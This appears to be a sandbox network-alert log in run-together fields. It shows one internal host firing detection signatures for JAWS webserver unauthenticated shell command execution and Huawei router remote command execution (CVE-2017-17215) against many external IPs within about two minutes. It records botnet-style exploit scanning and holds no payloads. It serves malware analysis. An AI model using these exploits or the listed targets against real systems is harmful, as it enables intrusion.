                                  192.168.2.2352.165.152.4336414802030092 07/19/22-13:08:08.823771TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3641480192.168.2.2352.165.152.43
                                  192.168.2.23181.49.134.20954552802030092 07/19/22-13:07:51.009888TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5455280192.168.2.23181.49.134.209
                                  192.168.2.23156.235.98.17649880372152835222 07/19/22-13:08:25.765751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988037215192.168.2.23156.235.98.176
                                  192.168.2.23147.46.197.7848994802030092 07/19/22-13:08:42.090797TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4899480192.168.2.23147.46.197.78
                                  192.168.2.2323.205.15.10139164802030092 07/19/22-13:08:59.355391TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3916480192.168.2.2323.205.15.101
                                  192.168.2.23156.237.5.19141656372152835222 07/19/22-13:08:55.343465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4165637215192.168.2.23156.237.5.191
                                  192.168.2.23114.33.162.5939342802030092 07/19/22-13:07:09.022807TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3934280192.168.2.23114.33.162.59
                                  192.168.2.23156.250.15.14549882372152835222 07/19/22-13:07:34.286455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4988237215192.168.2.23156.250.15.145
                                  192.168.2.2384.250.224.5746480802030092 07/19/22-13:08:20.413260TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4648080192.168.2.2384.250.224.57
                                  192.168.2.23156.247.24.13744580372152835222 07/19/22-13:07:46.281558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458037215192.168.2.23156.247.24.137
                                  192.168.2.2335.190.126.6439512802030092 07/19/22-13:08:20.384512TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3951280192.168.2.2335.190.126.64
                                  192.168.2.23159.69.210.14355948802030092 07/19/22-13:07:41.636396TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5594880192.168.2.23159.69.210.143
                                  192.168.2.23104.207.133.19352818802030092 07/19/22-13:08:48.538261TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5281880192.168.2.23104.207.133.193
                                  192.168.2.2331.14.15.1952882802030092 07/19/22-13:07:30.189828TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5288280192.168.2.2331.14.15.19
                                  192.168.2.23150.220.146.17050762802030092 07/19/22-13:07:13.993627TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5076280192.168.2.23150.220.146.170
                                  192.168.2.2381.43.46.23356586802030092 07/19/22-13:08:20.437702TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5658680192.168.2.2381.43.46.233
                                  192.168.2.2379.112.116.16858638802030092 07/19/22-13:07:30.276881TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5863880192.168.2.2379.112.116.168
                                  192.168.2.23198.15.222.11936218802030092 07/19/22-13:07:18.707780TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3621880192.168.2.23198.15.222.119
                                  192.168.2.23156.244.122.16355870372152835222 07/19/22-13:07:33.551264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5587037215192.168.2.23156.244.122.163
                                  192.168.2.2338.2.73.20859112802030092 07/19/22-13:07:45.824107TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5911280192.168.2.2338.2.73.208
                                  192.168.2.23172.121.29.14442252802030092 07/19/22-13:07:30.507181TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4225280192.168.2.23172.121.29.144
                                  192.168.2.2344.196.135.13035296802030092 07/19/22-13:08:03.641197TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3529680192.168.2.2344.196.135.130
                                  192.168.2.2361.222.103.4154822802030092 07/19/22-13:08:27.056616TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5482280192.168.2.2361.222.103.41
                                  192.168.2.23156.238.59.7940748372152835222 07/19/22-13:08:51.041853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4074837215192.168.2.23156.238.59.79
                                  192.168.2.23108.157.172.25254876802030092 07/19/22-13:07:59.808244TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5487680192.168.2.23108.157.172.252
                                  192.168.2.23156.254.71.3159512372152835222 07/19/22-13:08:06.055739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5951237215192.168.2.23156.254.71.31
                                  192.168.2.23191.249.246.15848414802030092 07/19/22-13:07:00.983108TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4841480192.168.2.23191.249.246.158
                                  192.168.2.2367.215.248.17250024802030092 07/19/22-13:08:17.956411TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5002480192.168.2.2367.215.248.172
                                  192.168.2.2334.120.151.24650750802030092 07/19/22-13:07:18.436964TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5075080192.168.2.2334.120.151.246
                                  192.168.2.2335.215.234.20335716802030092 07/19/22-13:07:51.077781TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3571680192.168.2.2335.215.234.203
                                  192.168.2.2323.239.25.12059972802030092 07/19/22-13:08:31.789856TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5997280192.168.2.2323.239.25.120
                                  192.168.2.23156.224.30.1345786372152835222 07/19/22-13:08:50.164950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4578637215192.168.2.23156.224.30.13
                                  192.168.2.23203.165.67.7338320802030092 07/19/22-13:08:59.672678TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3832080192.168.2.23203.165.67.73
                                  192.168.2.23134.209.180.1939264802030092 07/19/22-13:07:59.587836TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3926480192.168.2.23134.209.180.19
                                  192.168.2.23138.100.70.24941138802030092 07/19/22-13:07:18.589733TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4113880192.168.2.23138.100.70.249
                                  192.168.2.23192.126.133.9952538802030092 07/19/22-13:08:03.670375TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5253880192.168.2.23192.126.133.99
                                  192.168.2.23220.135.29.6958476802030092 07/19/22-13:07:33.289291TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5847680192.168.2.23220.135.29.69
                                  192.168.2.2335.182.199.16059316802030092 07/19/22-13:07:18.734555TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5931680192.168.2.2335.182.199.160
                                  192.168.2.23156.226.86.11643180372152835222 07/19/22-13:08:47.432528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4318037215192.168.2.23156.226.86.116
                                  192.168.2.2314.50.50.10837690802030092 07/19/22-13:07:52.986480TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3769080192.168.2.2314.50.50.108
                                  192.168.2.23122.49.70.538908802030092 07/19/22-13:08:45.821588TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3890880192.168.2.23122.49.70.5
                                  192.168.2.23121.189.165.12447750802030092 07/19/22-13:08:17.838910TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4775080192.168.2.23121.189.165.124
                                  192.168.2.23138.201.55.4247498802030092 07/19/22-13:07:08.545075TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4749880192.168.2.23138.201.55.42
                                  192.168.2.2368.183.192.12034686802030092 07/19/22-13:08:23.305924TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3468680192.168.2.2368.183.192.120
                                  192.168.2.2347.180.227.745334802030092 07/19/22-13:07:45.797815TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4533480192.168.2.2347.180.227.7
                                  192.168.2.23150.105.100.18745246802030092 07/19/22-13:07:51.810219TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4524680192.168.2.23150.105.100.187
                                  192.168.2.2352.86.208.152874802030092 07/19/22-13:08:48.675545TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5287480192.168.2.2352.86.208.1
                                  192.168.2.23197.246.248.1953284372152835222 07/19/22-13:07:33.444617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5328437215192.168.2.23197.246.248.19
                                  192.168.2.23156.232.90.21053920372152835222 07/19/22-13:07:20.172827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392037215192.168.2.23156.232.90.210
                                  192.168.2.2369.192.41.24937234802030092 07/19/22-13:08:28.973064TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3723480192.168.2.2369.192.41.249
                                  192.168.2.23104.76.84.15157314802030092 07/19/22-13:08:31.899183TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5731480192.168.2.23104.76.84.151
                                  192.168.2.2323.11.174.14253942802030092 07/19/22-13:07:47.439913TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5394280192.168.2.2323.11.174.142
                                  192.168.2.23186.189.233.2453668802030092 07/19/22-13:08:20.368047TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5366880192.168.2.23186.189.233.24
                                  192.168.2.2385.214.26.7749892802030092 07/19/22-13:08:56.548853TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4989280192.168.2.2385.214.26.77
                                  192.168.2.2318.213.74.5948794802030092 07/19/22-13:07:30.446773TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4879480192.168.2.2318.213.74.59
                                  192.168.2.2323.46.233.14751214802030092 07/19/22-13:07:59.820191TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5121480192.168.2.2323.46.233.147
                                  192.168.2.23156.226.74.3534138372152835222 07/19/22-13:07:44.419174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3413837215192.168.2.23156.226.74.35
                                  192.168.2.23168.196.224.24041734802030092 07/19/22-13:08:14.367886TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4173480192.168.2.23168.196.224.240
                                  192.168.2.23199.192.29.17548536802030092 07/19/22-13:08:40.505833TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4853680192.168.2.23199.192.29.175
                                  192.168.2.23156.225.150.16655178372152835222 07/19/22-13:07:41.259271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517837215192.168.2.23156.225.150.166
                                  192.168.2.2334.98.102.748406802030092 07/19/22-13:08:02.041392TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4840680192.168.2.2334.98.102.7
                                  192.168.2.2313.125.81.5242478802030092 07/19/22-13:08:31.660794TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4247880192.168.2.2313.125.81.52
                                  192.168.2.23156.226.13.7353392372152835222 07/19/22-13:08:49.997397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339237215192.168.2.23156.226.13.73
                                  192.168.2.2395.179.147.8443868802030092 07/19/22-13:08:31.691618TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4386880192.168.2.2395.179.147.84
                                  192.168.2.2379.172.2.23448482802030092 07/19/22-13:07:59.674611TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4848280192.168.2.2379.172.2.234
                                  192.168.2.2323.218.195.21243788802030092 07/19/22-13:08:20.510438TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4378880192.168.2.2323.218.195.212
                                  192.168.2.2350.87.189.13246932802030092 07/19/22-13:08:26.954055TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4693280192.168.2.2350.87.189.132
                                  192.168.2.235.189.163.14241490802030092 07/19/22-13:07:00.291930TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4149080192.168.2.235.189.163.142
                                  192.168.2.2338.63.104.3453988802030092 07/19/22-13:07:51.009981TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5398880192.168.2.2338.63.104.34
                                  192.168.2.23156.247.30.2332892372152835222 07/19/22-13:08:00.024205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3289237215192.168.2.23156.247.30.23
                                  192.168.2.2352.39.202.7145274802030092 07/19/22-13:07:18.471319TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4527480192.168.2.2352.39.202.71
                                  192.168.2.2352.14.225.7052808802030092 07/19/22-13:07:51.159151TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5280880192.168.2.2352.14.225.70
                                  192.168.2.2314.168.208.758434802030092 07/19/22-13:07:38.960118TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5843480192.168.2.2314.168.208.7
                                  192.168.2.23156.254.110.10548722372152835222 07/19/22-13:08:20.392396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4872237215192.168.2.23156.254.110.105
                                  192.168.2.23163.18.36.22550922802030092 07/19/22-13:07:18.819520TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5092280192.168.2.23163.18.36.225
                                  192.168.2.2395.169.185.21644296802030092 07/19/22-13:07:08.547095TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4429680192.168.2.2395.169.185.216
                                  192.168.2.2320.27.16.5452064802030092 07/19/22-13:08:27.305654TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5206480192.168.2.2320.27.16.54
                                  192.168.2.2367.7.129.6447702802030092 07/19/22-13:08:59.376095TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4770280192.168.2.2367.7.129.64
                                  192.168.2.23104.101.72.15239052802030092 07/19/22-13:08:12.913165TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3905280192.168.2.23104.101.72.152
                                  192.168.2.2346.16.19.19839646802030092 07/19/22-13:07:08.424793TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3964680192.168.2.2346.16.19.198
                                  192.168.2.23188.94.254.14352258802030092 07/19/22-13:07:31.946726TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5225880192.168.2.23188.94.254.143
                                  192.168.2.2323.238.159.10436642802030092 07/19/22-13:07:55.720725TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3664280192.168.2.2323.238.159.104
                                  192.168.2.23202.55.253.22251186802030092 07/19/22-13:07:25.288939TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5118680192.168.2.23202.55.253.222
                                  192.168.2.23197.234.41.14847132372152835222 07/19/22-13:08:09.719545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4713237215192.168.2.23197.234.41.148
                                  192.168.2.2388.221.43.9445814802030092 07/19/22-13:07:22.630188TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4581480192.168.2.2388.221.43.94
                                  192.168.2.23156.225.145.2237300372152835222 07/19/22-13:08:36.074281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730037215192.168.2.23156.225.145.22
                                  192.168.2.2393.57.23.11840154802030092 07/19/22-13:08:42.693762TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4015480192.168.2.2393.57.23.118
                                  192.168.2.2352.3.26.1160870802030092 07/19/22-13:07:18.609779TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6087080192.168.2.2352.3.26.11
                                  192.168.2.23213.240.159.12357152802030092 07/19/22-13:08:59.695313TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5715280192.168.2.23213.240.159.123
                                  192.168.2.2379.150.39.3551176802030092 07/19/22-13:08:02.408681TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5117680192.168.2.2379.150.39.35
                                  192.168.2.23199.232.38.20850688802030092 07/19/22-13:08:27.002815TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5068880192.168.2.23199.232.38.208
                                  192.168.2.23193.26.18.843232802030092 07/19/22-13:08:48.397942TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4323280192.168.2.23193.26.18.8
                                  192.168.2.23107.151.105.17856134802030092 07/19/22-13:07:00.689109TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5613480192.168.2.23107.151.105.178
                                  192.168.2.23104.65.190.10940774802030092 07/19/22-13:07:55.739443TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4077480192.168.2.23104.65.190.109
                                  192.168.2.23173.223.66.17650968802030092 07/19/22-13:07:11.684375TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5096880192.168.2.23173.223.66.176
                                  192.168.2.2323.10.97.22454572802030092 07/19/22-13:07:47.193068TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5457280192.168.2.2323.10.97.224
                                  192.168.2.23156.254.51.11036146372152835222 07/19/22-13:08:41.116750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3614637215192.168.2.23156.254.51.110
                                  192.168.2.23149.56.206.20437952802030092 07/19/22-13:08:37.314309TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3795280192.168.2.23149.56.206.204
                                  192.168.2.23173.230.132.18141466802030092 07/19/22-13:08:09.757077TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4146680192.168.2.23173.230.132.181
                                  192.168.2.23104.120.49.22346324802030092 07/19/22-13:08:31.696986TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4632480192.168.2.23104.120.49.223
                                  192.168.2.23156.226.94.16954188372152835222 07/19/22-13:08:50.227298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5418837215192.168.2.23156.226.94.169
                                  192.168.2.2347.40.30.15451156802030092 07/19/22-13:08:09.932953TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5115680192.168.2.2347.40.30.154
                                  192.168.2.23156.240.108.5452076372152835222 07/19/22-13:07:56.550874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207637215192.168.2.23156.240.108.54
                                  192.168.2.23192.95.37.8552808802030092 07/19/22-13:07:41.960969TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5280880192.168.2.23192.95.37.85
                                  192.168.2.2323.48.68.4335164802030092 07/19/22-13:08:37.381410TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3516480192.168.2.2323.48.68.43
                                  192.168.2.23218.149.214.15648734802030092 07/19/22-13:08:37.775075TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4873480192.168.2.23218.149.214.156
                                  192.168.2.2323.105.63.22634026802030092 07/19/22-13:08:26.957276TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3402680192.168.2.2323.105.63.226
                                  192.168.2.23144.91.120.21150312802030092 07/19/22-13:07:13.858525TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5031280192.168.2.23144.91.120.211
                                  192.168.2.23118.130.210.13933072802030092 07/19/22-13:07:44.373439TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3307280192.168.2.23118.130.210.139
                                  192.168.2.232.83.169.10242784802030092 07/19/22-13:07:44.018362TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4278480192.168.2.232.83.169.102
                                  192.168.2.2382.166.224.11458676802030092 07/19/22-13:08:08.520134TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5867680192.168.2.2382.166.224.114
                                  192.168.2.23129.219.200.6436980802030092 07/19/22-13:08:23.526620TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3698080192.168.2.23129.219.200.64
                                  192.168.2.2351.222.8.1157060802030092 07/19/22-13:08:54.156308TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5706080192.168.2.2351.222.8.11
                                  192.168.2.2324.97.13.21033572802030092 07/19/22-13:08:16.030563TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3357280192.168.2.2324.97.13.210
                                  192.168.2.23209.197.99.9553990802030092 07/19/22-13:08:51.991265TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5399080192.168.2.23209.197.99.95
                                  192.168.2.2386.24.52.10735044802030092 07/19/22-13:08:08.650000TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3504480192.168.2.2386.24.52.107
                                  192.168.2.23177.185.54.2757556802030092 07/19/22-13:08:20.634982TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5755680192.168.2.23177.185.54.27
                                  192.168.2.23156.241.125.15534794372152835222 07/19/22-13:07:53.128221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3479437215192.168.2.23156.241.125.155
                                  192.168.2.23156.244.101.2737302372152835222 07/19/22-13:07:00.050037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730237215192.168.2.23156.244.101.27
                                  192.168.2.2375.101.164.3356606802030092 07/19/22-13:07:00.761215TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5660680192.168.2.2375.101.164.33
                                  192.168.2.23161.117.235.19143316802030092 07/19/22-13:07:21.754600TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4331680192.168.2.23161.117.235.191
                                  192.168.2.2344.242.89.21238742802030092 07/19/22-13:07:22.151251TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3874280192.168.2.2344.242.89.212
                                  192.168.2.23179.53.73.24039618802030092 07/19/22-13:08:05.728719TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3961880192.168.2.23179.53.73.240
                                  192.168.2.23104.77.222.2159400802030092 07/19/22-13:07:45.848792TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5940080192.168.2.23104.77.222.21
                                  192.168.2.23198.2.241.11354854802030092 07/19/22-13:07:44.032450TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5485480192.168.2.23198.2.241.113
                                  192.168.2.2352.18.190.9943612802030092 07/19/22-13:07:47.620768TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4361280192.168.2.2352.18.190.99
                                  192.168.2.23156.225.158.20833774372152835222 07/19/22-13:08:36.220376TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3377437215192.168.2.23156.225.158.208
                                  192.168.2.2313.70.2.9455220802030092 07/19/22-13:07:59.717022TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5522080192.168.2.2313.70.2.94
                                  192.168.2.2335.241.58.22238106802030092 07/19/22-13:07:16.252637TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3810680192.168.2.2335.241.58.222
                                  192.168.2.2362.221.199.11341988802030092 07/19/22-13:07:33.557025TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4198880192.168.2.2362.221.199.113
                                  192.168.2.23116.93.97.2746340802030092 07/19/22-13:07:44.135909TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4634080192.168.2.23116.93.97.27
                                  192.168.2.23107.180.2.2948296802030092 07/19/22-13:07:45.729774TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4829680192.168.2.23107.180.2.29
                                  192.168.2.23213.215.11.20344276802030092 07/19/22-13:08:03.668976TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4427680192.168.2.23213.215.11.203
                                  192.168.2.2359.6.82.11133828802030092 07/19/22-13:08:16.293855TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3382880192.168.2.2359.6.82.111
                                  192.168.2.2345.39.175.18656224802030092 07/19/22-13:07:00.593310TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5622480192.168.2.2345.39.175.186
                                  192.168.2.23149.169.176.2054846802030092 07/19/22-13:08:37.374997TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5484680192.168.2.23149.169.176.20
                                  192.168.2.2323.65.67.24441390802030092 07/19/22-13:07:00.839037TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4139080192.168.2.2323.65.67.244
                                  192.168.2.2371.19.150.10949840802030092 07/19/22-13:08:41.934732TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4984080192.168.2.2371.19.150.109
                                  192.168.2.23156.254.54.17953736372152835222 07/19/22-13:07:33.948053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373637215192.168.2.23156.254.54.179
                                  192.168.2.2345.15.66.3444276802030092 07/19/22-13:07:08.624060TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4427680192.168.2.2345.15.66.34
                                  192.168.2.23168.196.159.17734494802030092 07/19/22-13:08:20.413084TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3449480192.168.2.23168.196.159.177
                                  192.168.2.23172.65.170.18260228802030092 07/19/22-13:07:11.607741TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6022880192.168.2.23172.65.170.182
                                  192.168.2.23156.226.120.22944798372152835222 07/19/22-13:07:00.334162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479837215192.168.2.23156.226.120.229
                                  192.168.2.23163.191.102.243154802030092 07/19/22-13:08:34.944618TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4315480192.168.2.23163.191.102.2
                                  192.168.2.23139.162.171.3459298802030092 07/19/22-13:08:17.610861TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5929880192.168.2.23139.162.171.34
                                  192.168.2.238.48.85.16738828802030092 07/19/22-13:08:37.804426TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3882880192.168.2.238.48.85.167
                                  192.168.2.23103.193.186.5648398802030092 07/19/22-13:08:46.045249TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4839880192.168.2.23103.193.186.56
                                  192.168.2.23185.150.32.17141640802030092 07/19/22-13:07:27.764346TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4164080192.168.2.23185.150.32.171
                                  192.168.2.2314.35.75.20348544802030092 07/19/22-13:08:29.140642TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4854480192.168.2.2314.35.75.203
                                  192.168.2.2334.248.28.14453692802030092 07/19/22-13:07:30.235891TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5369280192.168.2.2334.248.28.144
                                  192.168.2.23156.224.31.22142054372152835222 07/19/22-13:08:02.433819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205437215192.168.2.23156.224.31.221
                                  192.168.2.23104.120.217.9133622802030092 07/19/22-13:08:31.681740TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3362280192.168.2.23104.120.217.91
                                  192.168.2.23218.161.40.24536934802030092 07/19/22-13:07:46.889870TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3693480192.168.2.23218.161.40.245
                                  192.168.2.23118.130.210.13933228802030092 07/19/22-13:07:47.955961TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3322880192.168.2.23118.130.210.139
                                  192.168.2.23156.250.30.25138200372152835222 07/19/22-13:08:38.308547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3820037215192.168.2.23156.250.30.251
                                  192.168.2.2379.114.190.2154124802030092 07/19/22-13:08:59.720759TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5412480192.168.2.2379.114.190.21
                                  192.168.2.2384.86.204.23641168802030092 07/19/22-13:08:20.902036TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4116880192.168.2.2384.86.204.236
                                  192.168.2.23107.149.188.13239266802030092 07/19/22-13:07:26.262124TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3926680192.168.2.23107.149.188.132
                                  192.168.2.23156.230.249.10638922802030092 07/19/22-13:08:22.528689TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3892280192.168.2.23156.230.249.106
                                  192.168.2.23104.77.159.15343504802030092 07/19/22-13:07:52.813922TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4350480192.168.2.23104.77.159.153
                                  192.168.2.23156.241.9.6160224372152835222 07/19/22-13:07:57.784220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022437215192.168.2.23156.241.9.61
